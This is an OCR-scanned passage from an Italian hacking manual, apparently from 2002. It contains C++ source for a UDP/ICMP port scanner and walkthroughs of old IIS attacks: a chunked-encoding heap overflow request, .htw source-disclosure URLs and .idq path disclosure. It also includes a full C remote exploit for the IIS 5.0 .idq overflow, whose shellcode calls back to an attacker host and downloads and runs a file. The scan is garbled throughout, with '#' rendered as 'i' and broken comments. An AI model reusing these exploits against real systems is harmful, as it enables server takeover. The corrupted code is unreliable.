///////////////////////////////////////////////////////////////////////////// 
// 

// Bitmap 

// 

IDB_KOMODIA BITMAP DISCARDABLE "resWkomodia.bmp" 

iendif // Unknown language: OxD, Oxl resources 

///////////////////////////////////////////////////////////////////////////// 



iifndef APSTUDIO_INVOKED 

///////////////////////////////////////////////////////////////////////////// 
// 

// Generated front the TEXTINCLUDE 3 resource. 

// 

idefine _AFX_NO__SPLITTER_RESOURCES 
idefine _AFX_NO_OLE_RESOURCES 
idefine _AFX_NO_TRACKER_RESOURCES 
idefine _AFX_NO_PROPERTY_RESOURCES 

iif ! defined (AFX_RESOURCE_DLL ) Il defined (AFX_ TARG_ENU) 

iifdef _WIN32 

LANGUAGE 9, 1 

ipragma code _page (1252) 

iendif //_WIN32 

iinclude "res\UDPScaner . rc2 " // non— Microsoft Visual C++ edited resources 

iinclude "afxres . re" // Standard components 

iendif 

///////////////////////////////////////////////////////////////////////////// 
iendif // not APSTUDIO_INVOKED 

I file .CPP e .H contenenti la classe che gestisce la dialog sono : 

// UDPScanerDlg . h : header file 

// 

H f ! defined (AFX_ UDPSCANERDLG_H E6A 15D2B_ 6365_ 4C5AJB89C_E769D 758A4 68 INCLUDED_) 

idefine AFX_UDPSCANERDLG_H E6A75D2B_6365_4C5A_B89C_E769D758A468 INCLUDED_ 

Hf _MSC_VER > 1000 
ipragma once 

iendif // _MSC_VER > 1000 

///////////////////////////////////////////////////////////////////////////// 
// CUDPScanerDlg dialog 

class CScanSocket; 
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idefine ICMP__EVENT 100 

class CUDPScanerDlg : public CDlalog 
{ 

// Construction 
public: 

void Report () ; 

virtual ~CUDPScanerDlg () ; 

CUDPScanerDlg (CWnd* pParent = NULL) ; // standard constructor 

// Dialog Data 

//{ {AFX_DATA (CUDPScanerDlg) 

enum { IDD = IDD_UDPSCANER_DIALOG }; 

CListBox m_UDPList; 

CIPAddressCtrl m_DestinationIP ; 

int m_EndPort; 

int mStartPort; 

int m ScanDelay; 

BOOL m_AutoScroll; 

int m Loop; 

CStringm_URL; 

//} }AFX_DATA 

// ClassWizard generated virtual function overrides 

/ / { {AFXJVIRTUAL (CUDPScanerDlg) 

protected: 

virtual void DoDataExchange (CDataExchange* pDX) ; // DDX/DDV support 
//} }AFX_VIRTUAL 

// Implementation 
protected: 

HICON m_hIcon; 

// Generated message map functions 
//{ {AFX MSG (CUDPScanerDlg) 
virtual BOOL OnlnitDialog () ; 

afx_msg void OnSysCommand (UINT nID, LPARAM IParam) ; 
afx_msg void OnPaintf); 
afx_msg HCURSOR OnQueryDraglcon ( ) ; 
afx_msg void OnQuit () ; 
afx_msg void OnScan () ; 
afx__msg void Ondose (); 
//} }AFX_MSG 
DECLARE_MESSAGE_MAP () 
private: 

BOOL ConvertAddress ( ) ; 
char m cDestinationlP [16] ; 
int m LoopCount ; 
BOOL ICMPScan() ; 

LPSTR IPCtrlToSTR (CIPAddressCtrl* etri) ; 
CUDPSocket* m_UDP; 
CScanSocket* m_ICMP; 
BOOL Scan(); 

}; 

//{ (AFX_INSERT_LOCATION) ) 

// Microsoft Visual C++ will insert additional declarations immediately before the 
previous line . 

iendif // 

Idefined (AFX_UDPSCANERDLG_H E6A75D2B_6365_4C5A_B89C_E769D758A468 INCLVDED_) 



// UDPScanerDlg . epp : implementation file 

// 

^include "stdafx.h" 
^include "ScanSocket . h " 
tfinclude "UDPScaner . h" 
iinclude "UDPScanerDlg. h" 

iinclude " . . \ UDPSocket . h " 

Hfdef _DEBUG 
idefine new DEBUG_NEW 
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static char THIS_FILE[] = FILE ; 

iendif 

///////////////////////////////////////////////////////////////////////////// 
// CAboutDlg dialog used for App About 

class CAboutDlg : public CDialog 
{ 

public: 

CAboutDlg () ; 

// Dialog Data 

//{ {AFX_DATA (CAboutDlg) 
enum { IDD = IDD_ABOUTBOX }; 
//} }AFX_DATA 

// ClassWizard generated virtual function overrides 

// { {AFX VIRTUAL (CAboutDlg) 

protected: 

virtual void DoDataExchange (CDataExchange* pDX) ; // DDX/DDV support 
//} }AFX_VIRTUAL 

// Implementation 
protected: 

//{{AFX_JiSG (CAboutDlg) 

//} }AFX_MSG 

DECLARE_MESSAGE_MAP () 

ì; 

CAboutDlg: -.CAboutDlg () : CDialog (CAboutDlg :: IDD) 
{ 

//{ {AFX_DATA_INIT (CAboutDlg) 
//} }AFX_DATA_INIT 

} 

void CAboutDlg: : DoDataExchange (CDataExchange* pDX) 
{ 

CDialog: : DoDataExchange (pDX) ; 
// { {AFX_DATA_MAP (CAboutDlg) 
//} }AFX_DATA_MAP 

) 

BEGIN_MESSAGE_MAP (CAboutDlg, CDialog) 

//{ {AFX_MSG_MAP (CAboutDlg) 

// No message handlers 

//} }AFX_MSG_MAP 
END_MESSAGE_MAP () 

///////////////////////////////////////////////////////////////////////////// 
// CUDPScanerDlg dialog 

CUDPScanerDlg : : CUDPScanerDlg (CWnd* pParent /*=NULL*/) 
: CDialog (CUDPScanerDlg :: IDD, pParent) 

{ 

//( {AFX_DATA_INIT (CUDPScanerDlg) 

m_EndPort = 0; 

m_StartPort = 0; 

m_ScanDelay = 20; 

m_AutoScroll = TRUE; 

m_Loop = 5; 

m_URL = _T(" ") ; 

//} )AFX_DATA_INIT 

// Note that Loadlcon does not require a subsequent Destroylcon in Win32 
m_hIcon = AfxGetApp ( ) —>LoadIcon (IDR_MAINFRAME) ; 

m_ICMP=NULL; 
m_UDP=NULL; 

) 

void CUDPScanerDlg: -.DoDataExchange (CDataExchange* pDX) 
{ 

CDialog: : DoDataExchange (pDX) ; 
//{ (AFX_DATA_MAP (CUDPScanerDlg) 
DDX_Control (pDX, IDC_UDPLIST, m_UDPList) ; 
DDX_Control (pDX, IDC_DESTINATIONIP , m_DestinationIP) ; 
DDXJText(pDX, IDC_ENDPORT, m_EndPort) ; 
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DDX^Text (pDX, IDC^STARTPORT, m_StartPort) ; 
DDV__MinMaxInt (pDX, m_StartPort, 0, 65535); 
DDX^Text (pDX, IDC_DELAY, m_ScanDelay) ; 
DDV_MinMaxInt (pDX, m_ScanDelay , 0, 1000); 
DDX_Check(pDX, IDC_SCROLL, m_AutoScroll) ; 
DDX_Text (pDX, IDC_LOOP, m_Loop) ; 
DDV_M±nMaxInt (pDX, m_Loop, 1, 100); 
DDX_Text (pDX, IDC_ADDRESS, m_URL) ; 
//} }AFX_DATA__MAP 

) 

BEGIN_MESSAGE__MAP (CUDPScanerDlg, CDialog) 

/ / { {AFX_JiSG_MAP (CUDPScanerDlg) 

ON_WM_SYSCOMMAND () 

ON_WM_PAINT() 

0N_ WM_ QUER YDRAGICON ( ) 

ON_BN_CLICKED(IDC_QUIT, OnQuit) 

ON_BN_CLICKED(IDC_SCAN, OnScan) 

ON_WM_CLOSE() 

//} }AFX_MSG_MAP 
END_MESSAGE_MAP () 

///////////////////////////////////////////////////////////////////////////// 
// CUDPScanerDlg message handlers 

BOOL CUDPScanerDlg: :OnInitDialog() 
{ 

CDialog: : OnlnitDialog ( ) ; 

// Add "About. . . " menu item to system menu. 

// IDM_ABOUTBOX must be in the system command range. 
ASSERT ( (IDM_ABOUTBOX S OxFFFO) == IDM_ABOUTBOX) ; 
ASSERT (IDM_ABOUTBOX < OxFOOO) ; 

CMenu* pSysMenu = GetSystemMenu (FALSE) ; 

if (pSysMenu != NULL) 

{ 

CString strAboutMenu; 

strAboutMenu . LoadString (IDS_ABOUTBOX) ; 

if (! strAboutMenu. IsEmpty () ) 

{ 

pSysMenu->AppendMenu (MF_SEPARATOR) ; 

pSysMenu->AppendMenu (MF STRING, IDM_ABOUTBOX, strAboutMenu) ; 

) 

} 

// Set the icon for this dialog. The framework does this automatically 
// when the application ' s main window is not a dialog 
Setlcon (m_h!con, TRUE) ; // Set big icon 

Setlcon (m hi con, FALSE) ; // Set small icon 

// TODO: Add extra initialization here 

return TRUE; // return TRUE unless you set the focus to a control 

} 

void CUDPScanerDlg :: OnSysCommand (UINT nID, LPARAM lParam) 
{ 

if ((nID & OxFFFO) == IDM_ABOUTBOX) 
{ 

CAboutDlg dlgAbout; 
dlgAbout . DoModal () ; 

} 

else 
{ 

CDialog: : OnSysCommand (nID, lParam) ; 

} 

} 

// If you add a minimize button to your dialog, you will need the code below 
// to draw the icon. For MFC applications using the document/view model, 
// this is automatically done for you by the framework. 



void CUDPScanerDlg: -.OnPaint () 
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l 

CPaintDC de (this) ; // device context for painting 

SendMessage (WMICONERASEBKGND, (WPARAM) de . GetSafeHdc () , 0) ; 

// Center icon in client rectangle 

int cxlcon = GetSystemMetrics (SM_CXICON) ; 

int cyleon = GetSystemMetrics (SM_CYICON) ; 

CRect rect ; 

GetClientRect (irect) ; 

int x = (rect.Width() - cxlcon + 1) / 2; 
int y = (rect .Height () - cyleon + 1) / 2; 

// Draw the icon 

de . Drawlcon (x, y, m_hIcon) ; 

} 

else 
{ 

CDialog: -.OnPaint () ; 

} 

} 

// The system calls this to obtain the cursor to display while the user drags 

// the minimized window. 

HCURSOR CUDPScanerDlg: : OnQueryDraglcon () 

{ 

return (HCURSOR) m_Jilcon; 

ì 

void CUDPScanerDlg: -.OnQuit () 
{ 

//Quit 

EndDialog (0) ; 

} 

void CUDPScanerDlg: :OnScan() 
{ 

//First validate data 
if (UpdateData (TRUE) ) 
Scan () ; 

} 

BOOL CUDPScan erDlg : : Scan ( ) 
{ 

//First if no ICMP create it 

if (!m_ICMP) 

{ 

m_ICMP=new CScanSocket (this) ; 

m_ICMP->SetInstance (AfxGetlnstanceHandle () ) ; 
m_ICMP->SetRaw (TRUE) ; 
m_ICMP->Create () ; 

//Let OS know we are alive 

m__ICMP->SendEcho ( "127. 0.0.1", FALSE, 0,0,0) ; 

} 

//If no UDP create it 

if (!m_UDP) 

{ 

m_UDP=new CUDPSocket; 
m_UDP->Create () ; 

} 

//Check if we have a raw address 
if ( ! ConvertAddress () ) 
return FALSE; 

//Convert the address 
char* cTmp; 

cTmp=IPCtrlToSTR (Sm_DestinationIP) ; 

if (ìcTmp) 
{ 

MessageBox ("Invalid address" , "Error") ; 
return FALSE; 

} 
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memcpy (mcDestinationlP , cTmp, 1 6) ; 

m_ICMP->SetDestinationIP (inet_addr (m cDestinationlP) ) ; 

//Add scanning message 
char tmp [40] = " Scanning: "; 

strcat (tmp,m_cDestinationIP) ; 
mJUDPList . AddString (tmp) ; 

//Update display 
UpdateData (FALSE) ; 

//Reset list 
m_ICMP->ResetList () ; 

//Set loop count 
m_LoopCount=m Loop; 

//Scan 

return ICMPScan () ; 



} 



CUDPScanerDlg: : ~CUDPScanerDlg () 

{ 

) 

void CUDPScanerDlg: : Ondose () 
{ 

if (m_ICMP) 

delete m_ICMP; 

if (m_UDP) 

delete m_UDP; 



CDialog: : Ondose () ; 



} 



LPSTR CUDPScanerDlg: : IPCtrlToSTR (dPAddressCtrl* etri) 
{ 

//Converts the control address to textual address 

//Convert bytes to string 

BYTE bOctetl; 

BYTE b0ctet2; 

BYTE b0ctet3; 

BYTE bOcteté; 

//Get the value and blank values 
int iBlank; 

iBlank=ctrl->GetAddress (bOctetl ,b0ctet2, b0ctet3, b0ctet4) ; 

if (iBlank! =4) 

//Hot filled 
return NULL; 

else 
{ 

in_addr iAddr; 

iAddr. S_un . S_un_b. s_bl=bOctetl ; 
iAddr. S_un . S__un_b. S_b2=b0ctet2 ; 
iAddr. S_un . S_un_b. s_b3=bOctet3; 
iAddr. S_un . S_un_b. s_b4=bOctet4 ; 

return inet_ntoa (iAddr) ; 

} 

} 

void CUDPScanerDlg: -.Report () 
{ 

if ( ! m_LoopCount ) 
{ 

for (int iCount=m_StartPort ; iCount<=m_EndPort ; iCount++) 
if ( !m_ICMP->GetBit (iCount) ) 
{ 

//Convert it to string 
char tmp [6]; 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



else 



m_UDPList . AddString (tmp) ; 



if (m_AutoScroll) 

m_UDPList . SetTopIndex (m_UDPList . GetCount ()-5) ; 

//Add done notice 

m_UDPList .AddString ( "Done scanning" ) ; 



ICMPScan () ; 



} 



BOOL CUDPScanerDlg : : ICMPScan () 
{ 

//Scan 

int iCount; 

for (iCount=m_StartPort ; iCount <=m_EndPort; iCount++) 
//Only if not scaned 
if (!m_ICMP->GetBit(iCount) ) 
{ 

if (m_ScanDelay) 

Sleep (m_ScanDelay) ; 

m_J3DP->Send (0, m_cDestinationIP , iCount, NULL, NULL) ; 



/ /Decrement the count 
— m_LoopCount ; 

//And set the scan timeout 
m_ICMP->SetTimeout ( SLEEP_ TIMEOUT) ; 

//Return OK 
return TRUE; 



BOOL CUDPScanerDlg : : ConvertAddress ( ) 
{ 

if (m_URL=="") 

return TRUE; 

long lAddr; 

lAddr=m_ICMP->ResolveDNS (m__URL) ; 

if (lAddr) 
{ 



} 

else 



//Correct 

m DestinationlP . SetAddress (htonl (lAddr) ) ; 

//Clear the address 
m_URL= " "; 



//Display error 

MessageBox ( "Couldn ' t resolve host name" , "Error" ,MB_OK) ; 



return lAddr; 
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L'hacking reale 
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I problemi con i W EB 



Esistono una serie di problemi che coinvolgono i WEB servers che dipendono dalla 
digitazione di determinati caratteri o che grazie alle richieste di determinati files forniscono 
informazioni che dicono all'hacker come di fatto è costituita la struttura dei files del sistema. 
Chiaramente queste non sono regole e dipendono comunque dal software adottato come 
WEB server, dal sistema operativo e dalle patch installate su questi. 

Spesso il fatto di fornire informazioni dipende anche da come viene settato il software di 
gestione del WEB server. 

W indows 2 000 and NT4 I I S .ASP Remote Buffer Overf low 

Pochissimi giorni fa è stato trovato un buffer overflow all'interno dei server MS che usano 

ASP. 

Questo problemariguarda una DLL ISAPI. 

Con il solito NETCAT provate ad aprire una sessione sul server con un certo IP e sulla porta 
80 e scrivete : 

************** I p 36ssion ****** ********** 
POST /iisstart.asp HTTP/1.1 
Accept: 7* 
Host: eeye.com 

Content-Type: application/x-www-form-urlencoded 
Transfer-Encoding: chunked 

10 

PADPADPADPADPADP 
4 

DATA 
4 

DEST 
0 

[enter] 
[enter] 

'End Session* 



************** o_„„ ;_„****************** 



L'esempio di prima fa in modo che vemga generata un exception a partire dal child process 
dllhost. 

Quando il default exception handler viene eseguito la finestra con il testo che segue viene 
aperta : 

DLLHOST.EXE - Application error 



Il valore 0x5434544 è la rappresentazione esadecimale di TSED' o del valore 'DEST 
(guardate quello che abbiamo scritto prima) in formato little-endian (il formato little endian è 
un formato di un computer che salva in un determinato modo). 
Il processo DLLHOST prova a copiare 'DATA' su 'DEST. 

Dato che non esiste memoria scrivibile a 0x5434544, viene generato una structired exception 
handling (SEH). 

Il problema fondamentale è che la memoria che sovrascriviamo contiene la struttura del Heap 
Management Header usato in quesyto caso da AllocateHeap(). 

Allo stesso modo con cui abbiamo soprascritto la struttura possiamo anche controllare due 
indirizzi da 4 BYTES. 

I primi 4 bytes, quelli sovrascritti da 'DATA', è un indirizzo che viene copiato suii secondi 4 
bytes, questa volta 'DEST'. 

Sovrascrivendo questi due indirizzi possiamo mettere 4 bytes in memoria ovunque che dllhost 
ha il privilegio di scriverci sopra. 
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Questo ci permette di sovrascrivere puntatori a funzioni, exception handler, punatori a 
istruzioni salvate o qualsiasi altra cosa che ci permette di gestire il flusso dell'esecuzione 
dentro al nostro payload. 

Questa vulnerabilità non viene protetta dai firewalls. 
Cerberus I nformation Security 

Il Cerberus Security Team yha trovato questo problema realtivo ai WEB Server MS vesione 4 
e versione 5 che funzionano con Index Server. 
Qando viene eseguita una richiesta del tipo : 



l'utente dovrebbe vedere solo la parte HTML restituita dal comando stesso. 

Se alla fine di questa stringa CiWebHitsFile viene aggiunto un %20 il tutto diventa : 



e a questo punto diventa possibile la visualizzazione dei sorgenti. 

Il problema esiste in quanto null.htw di fatto non è un file reale che può essere mappato 
qualsiasi file dentro al sistema Windows. 

Un altro tipo di exploit utilizzante questa metodologia è ottenuta mediante la richiesta : 

)://vittima.com/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/repair/setu|: 



In questo caso l'exploit dipende dal fatto che siano installati gli esempi opzionali di MS. 
Qualsiasi richiesta utilizzante null.htw occupa webhits.dll. 
Questa dll è fonte di molti problemi dentro ai sistemi MS. 

Come abbiamo detto prima la DLL fa parte di Microsoft Indexing Services il quale viene 
installato di default sotto Windows 2000 anche se poi di fatto questo non parte se non viene 
appositamente attivato. 

Quando attivato questo servizio estende MS tramite questa dll che di fatto si attiene alla 
metodologia ISAPI. 

La sua attivazione è dipendente dalla richiesta del file con estensione .HTW, come abbiamo 
visto nell'esempio di prima. 

Il primo esempio non funziona sulle versioni di MS 5 mentre il secondo esempio visto dipende 
dall'installazione degli esempi. 

Una terza metodologia d'attacco invece utilizza un sistema definito con il termine di "buffer 
truncation". 

Questo funziona appendendo una richiesta di un file valido ad un grosso numero di spazi 
(%20) ed un file .HTW. 

Facciamo un esempio usando il file che viene utilizzato per segnalare il sito in costruzione. 
Questo file è presente nella root directory di MS 5 e si chiama iistart.asp 
Mediante netcat o telnet aperto su un certo indirizzo e sulla porta 80 digitate : 

GET 

/iistart.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 
%20%20%20%20%20 [ 221 %20 ] 

%20%20%20%20.htw&CiWebHitsFile=/exair5/siteadmin/default.asp&CiRestriction=none&Ci 
HiliteType=Full HTTP/1.0 

Esiste in circolazione una piccola utility chiamata IISCAT che svolge questa funzione di 

inserire la stringa. 

L'uso di IISCAT è come segue : 



Anche in questo caso è stato viene utilizzato il pipe per collegare l'output con netcat. 
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I files .1 DQ, I DA 

Alcune attività svolte dagli hacker pretenderebbero per un buona riuscita di conoscere i 
percorsi dei vari files di sistema sia per quanto riguarda il sistema operativo che invece per 
quanto inerente alla configurazione relativa all'installazione di software come quelli dei vari 

servers. 

Ad esempio la directory di default di MS generalmente è 



\inetpub 



ma questa potrebbe essere stata cambiata in fase di installazione o di settaggio del server 
stesso. 

Alcuni exploits pretendono la conoscenza del percorso dove il server è installato. 

Alcuni bugs permettono di venire a conoscenza del percorso assoluto di questi files. 

Il software di settaggio di MS permette di stabilire il comportamento di questo nel caso in cui 

vengano richiesti determinati files con alcuni tipi di estensioni. 
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Supponiamo di richiedere da browser un file con un nome inventato che possegga come 

estensione .IDQ oppure .IDA. 

Ad esempio potremmo richiedere : 



Il server se non è stato settato in modo tale da non dare risposta, risponderà con il messaggio 



The IDQ file c:\inetpub\wwwroot\pippo.idq could not be found. 

In questo modo saremo in grado di conoscere il percorso di dove si trovano I files del WEB 
interrogato. 
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Se l'amministratore di sistema ha settato il flag 'Check that file exist' allora le informazioni non 
verranno visualizzate per cui questo di fatto non è un bugs vero e proprio ma semplicemente 
un difetto di settaggio di MS. 




Informazioni varie possono essere anche mostrate dal server MS nel caso in cui vengano 
specificati files con estensione .IDA 

Lo stesso capita specificando al termine dell'URL il file con estensione .IDC. 
Lo stereotipo di risposta data realtiva al percorso visualizzato è di fatto : 

%documentroot % \ <nome file>. idc 

Un esempio di risposta in questo caso potrebbe essere : 



Di fatto esistono almeno una dozzina di files che creano lo stesso problema. 

In alcuni casi la pericolosità dipende da componenti che i vari servers caricano in memoria 

per la gestione di determinate funzionalità. 

Microsoft tra le sue metodologie gestionali possiede quelle chiamate con il termine di IISAPI 
ovvero una serie di DLL ciascuna delle quali viene utilizzata per la gestione di files con 
particolari estensioni. 

Tra queste ad esempio ne esiste una chiamata IDQ.DLL la quale fornisce due particolari 
funzioni e precisamente il supporto per gli script di amministrazione (files .ida) e quello 
definito Internet Data Queries (files .idq) 

Questa DLL possiede una vulnerabilità legata ad un buffer non controllato nella parte di 
codice che gestisce l'inserimento dell' URL. 

Per stabilire una sessione WEB con il server è possibile utilizzare questo problema. 

IDQ.DLL viene eseguita in un contesto di sistema per cui l'esecuzione del exploit permette 

all'attaccante di avere il completo possesso del sistema. 

Il buffer overrun capita quando viene richiesta un funzionalità di indicizzazione. 

Come risultato, visto che IDQ.DLL è una parte del servizio di Server/lndexing 

Il seguente codice testa la vulnerabilità : 



/* 

IIS5.0 .idq overrun remote exploit 
Programmed by hsj : 01 .06.21 

code flow: 

overrun -> jmp or cali ebx -> jmp 8 -> 

check shellcode addr and jump to there -> 

shellcode -> make back channel -> download & exec code 

7 
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#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <signal.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <sys/ioctl.h> 
#include <sys/time.h> 
#include <sys/wait.h> 
#include <errno.h> 
#include <unistd.h> 
#include <fcntl.h> 
#include <netinet/in.h> 
#include <limits.h> 
#include <netdb.h> 
#include <arpa/inet.h> 

#define RET 0x77e51 6de /* jmp or cali ebx 7 

#define GMHANDLEA 0x77e56c42 /* Address of GetModuleHandleA 7 

#define GPADDRESS 0x77e59ac1 /* Address of GetProcAddress 7 

#define GMHANDLEA OFFSET 24 

#define GPADDRESS_OFFSET 61 

#define OFFSET 234 /* exception handler offset 7 

#define NOP 0x41 

#define MASKING 1 
#if MASKING 

#define PORTMASK 0x4141 
#define ADDRMASK 0x41414141 
#define PORTMASK OFFSET 128 
#define ADDRMASK OFFSET 133 
#endif 

#define PORT 80 

#define ADDR "attacker.mydomain.co.jp" 
#define PORT OFFSET 115 
#define ADDR OFFSET 120 
unsigned char shellcode[]= 

"\x5B\x33\xC0\x40\x40\xC1 \xE0\x09\x2B\xE0\x33\xC9\x41 \x41 \x33\xC0" 

"\x51\x53\x83\xC3\x06\x88\x03\xB8\xDD\xCC\xBB\xAA\xFF\xD0\x59\x50" 

"\x43\xE2\xEB\x33\xED\x8B\xF3\x5F\x33\xC0\x80\x3B\x2E\x75\x1E\x88" 

"\x03\x83\xFD\x04\x75\x04\x8B\x7C\x24\x10\x56\x57\xB8\xDD\xCC\xBB" 

"\xAA\xFF\xD0\x50\x8D\x73\x01\x45\x83\xFD\x08\x74\x03\x43\xEB\xD8" 

"\x8D\x74\x24\x20\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\xFC\xFF\xD0" 

"\x8B\xF8\x33\xC0\x40\x40\x66\x89\x06\xC1\xE0\x03\x50\x56\x57\x66" 

"\xC7\x46\x02\xBB\xAA\xC7\x46\x04\x44\x33\x22\x1 1 " 

#if MASKING 

"\x66\x81 \x76\x02\x41 \x41 \x81 \x76\x04\x41 \x41 \x41 \x41 " 
#endif 

"\x8B\x46\x F8\x FF\x D0\x33\xC0" 

"\xC7\x06\x5C\x61 \x61 \x2E\xC7\x46\x04\x65\x78\x65\x41 \x88\x46\x07" 
"\x66\xB8\x80\x01 \x50\x66\xB8\x01 \x81 \x50\x56\x8B\x46\xEC\xFF\xD0" 
"\x8B\xD8\x33\xC0\x50\x40\xC1 \xE0\x09\x50\x8D\x4E\x08\x51 \x57\x8B" 
"\x46\xF4\xFF\xD0\x85\xC0\x7E\x0E\x50\x8D\x4E\x08\x51\x53\x8B\x46" 
"\xE8\xFF\xD0\x90\xEB\xDC\x53\x8B\x46\xE4\xFF\xD0\x57\x8B\x46\xF0" 
"\xFF\xD0\x33\xC0\x50\x56\x56\x8B\x46\xE0\xFF\xD0\x33\xC0\xFF\xD0"; 

unsigned char storage[]= 

"\xEB\x02" 

"\xEB\x4E" 
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"\xE8\xF9\xFF\xFF\xFF" 

"msvcrt.ws2_32.socket.connect.recv.closesocket." 
"_open._write._close._execl."; 

unsigned char forwardjump[]= 
"%u08eb"; 

unsigned char jump_to_shell[]= 

"%uC033%uB866%u031F%u0340%u8BD8%u8B03" 

"%u6840%uDB33%u30B3%uC303%uE0FF"; 

unsigned int resolve(char *name) 
{ 

struct hostent *he; 
unsigned int ip; 

if((ip=inet_addr(name))==(-1 )) 
{ 

if((he=gethostbyname(name))==0) 

return 0; 
memcpy(&ip,he->h_addr,4); 

} 

return ip; 

} 

int make_connection(char *address,int porr) 
{ 

struct sockaddrjn server, target; 
int s,i,bf; 
fd_set wd; 
struct timeval tv; 

s = socket(AF_INET,SOCK_STREAM,0); 
if(s<0) 
return -1 ; 

memset((char *)&server,0,sizeof (server)); 
server.sin_family = AFJNET; 
server.sin_addr.s_addr = htonl(INADDRANY); 
server. sin_port = 0; 

target. sin_family = AFJNET; 

target. sin_addr.s_addr = resolve(address); 

if(target.sin_addr.s_addr==0) 

{ 

close(s); 
return -2; 

} 

target. sin_port = htons(port); 
bf = 1 ; 

ioctl(s,FIONBIO,&bf); 
tv.tv_sec =10; 
tv.tv_usec = 0; 
FD_ZERO(&wd); 
FD_SET(s,&wd); 

connect(s, (struct sockaddr *)&target,sizeof(target)); 

if((i=select(s+1 ,0,&wd,0,&tv))==(-1 )) 

{ 

close(s); 
return -3; 

} 
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if(i==0) 
{ 

close(s); 
return -4; 

} 

i = sizeof(int); 

getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i); 

if((bf!=0)||(i!=sizeof(int))) 

{ 

close(s); 
ermo = bf; 
return -5; 

} 

ioctl(s,FIONBIO,&bf); 
return s; 

} 

int get_connection(int port) 
{ 

struct sockaddrin locai, remote; 
int lsock,csock,len,reuse_addr; 

Isock = socket(AF_INET,SOCK_STREAM,0); 

if(lsock<0) 

{ 

perrorfsocket"); 
exit(1); 

} 

reuse_addr = 1 ; 

if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char 
*)&reuse_addr,sizeof(reuse_addr))<0) 
{ 

perrorfsetsockopt"); 

close(lsock); 

exit(1); 

} 

memset((char *)&local,0,sizeof(local)); 

locai. sin_family = AFJNET; 

locai. sin_port = htons(port); 

local.sin_addr.s_addr = htonl(INADDR_ANY); 

if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0) 

{ 

perror("bind"); 

close(lsock); 

exit(1); 

} 

if(listen(lsock,1)<0) 
{ 

perrorflisten"); 

close(lsock); 

exit(1); 

} 

retry: 

len = sizeof (remote); 

csock = accept(lsock, (struct sockaddr *)&remote,&len); 

if(csock<0) 

{ 

if(errno!=EINTR) 
{ 

perror("accept"); 
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close(lsock); 
exit(1); 

} 

else 

goto retry; 

} 

close(lsock); 
return csock; 

} 

int main(int argcchar *argv[]) 
{ 

int i,j,s,pid; 

unsigned int cb; 

unsigned short port; 

char *p,buf[51 2],buf2[51 2],buf3[2048]; 

FILE *fp; 

if(argc!=3) 
{ 

printffusage: $ %s ip file\n",argv[0]); 
return -1 ; 

} 

if((fp=fopen(argv[2],"rb"))==0) 
return -2; 

if(!(cb=resolve(ADDR))) 
return -3; 

if((pid=fork())<0) 
return -4; 

if(pid) 
{ 

fclose(fp); 

s = make_connection(argv[1],80); 

if(s<0) 

{ 

printffconnect error:[%d].\n",s); 

kill(pid,SIGTERM); 

return -5; 

} 

j = strlen(shellcode); 

"(unsigned int *)&shellcode[GMHANDLEA_OFFSET] = GMHANDLEA; 
"(unsigned int *)&shellcode[GPADDRESS_OFFSET] = GPADDRESS; 
port = htons(PORT); 
#if MASKING 

port A = PORTMASK; 
cb A = ADDRMASK; 

"(unsigned short *)&shellcode[PORTMASK_OFFSET] = PORTMASK; 
'(unsigned int *)&shellcode[ADDRMASK_OFFSET] = ADDRMASK; 
#endif 

'(unsigned short *)&shellcode[PORT_OFFSET] = port; 
"(unsigned int *)&shellcode[ADDR_OFFSET] = cb; 
for(i=0;kstrlen(shellcode);i++) 
{ 

if((shellcode[i]==OxOa)|| 
(shellcode[i]==0x0d)|| 
(shellcode[i]==0x3a)) 
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break; 

} 

if(i!=j) 
{ 

printf("bad portno or ip address...\n"); 
close(s); 

kill(pid,SIGTERM); 
return -6; 

} 

memset(buf,1 .sizeof(buf)); 
p = &buf[OFFSET-2]; 
sprintf(p,"%s",forwardjump); 
p += strlen(forwardjump); 

*P++ = 1 ; 
*p++ = '%'; 
*p++ = 'u'; 

sprintf(p,"%04x",(RET»0)&0xffff); 
p+=4; 
*p++ = '%'; 
*p++ = 'u'; 

sprintf(p,"%04x",(RET»16)&0xffff); 
P += 4; 

*P++ = 1 ; 

sprintf(p,"%s",jump_to_shell); 
memset(buf2,NOP,sizeof(buf2)); 

memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1 ], Storage, strlen(storage)); 
memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(shellcode)); 
buf2[sizeof(buf2)-1] = 0; 

sprintf(buf3,"GET /a.idq?%s=a HTTP/1 .OVAnShell: %s\r\n\r\n",buf,buf2); 
write(s,buf3,strlen(buf3)); 

printf ("—"); 

for(i=0;kstrlen(buf3);i++) 
{ 

if((i%1 6)==0) 
printf ("\n"); 
printf ("%02X ",buf3[i]&0xff); 

} 

printf ("\n— \n"); 

wait(O); 
sleep(1); 
shutdown(s,2); 
close(s); 

printf("Done.\n"); 

} 

else 
{ 

s = get_connection(PORT); 
j = 0; 

while((i=fread(buf,1 ,sizeof(buf),fp))) 
{ 

write(s,buf,i); 

j += i; 

printf("."); 

fflush(stdout); 
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} 

fclose(fp); 

printf("\n%d bytes send...\n",j); 

shutdown(s,2); 
close(s); 

} 

return 0; 

} 



Fingerprinting e attacchi sulla porta 80 

Come abbiamo detto, e anche visto in alcuni casi, esistono situazioni legate alla cattiva 
gestione fatta dai WEB server rispetto alle stringhe passate come argomenti, che permettono 
di creare problemi alcuni dei quali legati appunto alla security. 

Da questo punto di vista è possibile provare qualsiasi combinazione di tasti, anche quelli che 
di fatto non sono riportati in nessuna lista. 

Altri tipi di problemi sono portati dalla presenza di files particolari che generalmente vengono 
utilizzati per determinati scopi come ad esempio il caso del file PHF che ha come scopo 
quello di gestire come utility CGI-BIN un indirizzario di numeri telefonici. 
Vediamo alcuni casi di problemi presenti su alcuni siti WEB causati da caratteri particolari o 
da files lasciati sul sistema dall'amministratore. 



I I file PHF 

